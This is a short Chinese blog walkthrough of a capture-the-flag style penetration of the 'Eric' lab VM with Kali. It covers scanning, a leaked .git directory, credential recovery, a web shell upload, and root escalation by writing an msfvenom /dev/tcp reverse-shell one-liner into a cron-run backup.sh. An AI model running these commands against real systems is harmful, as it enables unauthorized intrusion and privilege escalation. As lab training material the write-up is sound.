利用kali对Eric靶机渗透

刚开始用kali扫描virtualbox网段发现扫描不到靶机,百度说是要更改网络设置

于是进行网络设置,选为仅主机(Host-Only)网络

再次使用kali进行扫描主机所在c段网络

发现开放了一个80端口,对这个端口所在网段进行扫描

扫描发现一个.git文件

使用kali自带的目录遍历工具dirb,便利端口网段

发现admin.php文件,在浏览器中打开,发现是一个登录界面

使用githack工具获取admin.php文件内容

打开admin.php文件获得账号和密码

登录后得到一个有更多登录项的界面

随意填写表,上传一个shell

进入upload的目录,得到第一个flag

cd /home
ls -al
cd eric
ls -al
cat flag.txt


利用backup.sh文件来提权到root,创建了一个msfvenom脚本

msfvenom -p cmd/unix/reverse_bash lhost=192.168.56.102 lport=4455 R
复制脚本内容,然后切换到靶机的shell会话中,使用echo命令,将内容写入到backup.sh中

echo "0<&129-;exec 129<>/dev/tcp/192.168.56.102/4455;sh <&129 >&129 2>&129" > backup.sh

cat backup.sh

打开一个新的终端,再创建另外一个nc监听器,监听的端口就是刚才使用msfvenom创建脚本时的端口,4455。接着,我们执行一下这个backup.sh文件,马上就获得了一个root shell。我们还是需要使用Python语句来进入到系统的shell中。接着,我们切换到root目录下,看到了root flag






posted @ 2020-03-31 20:46  snow-s  阅读(253)  评论(0)    收藏  举报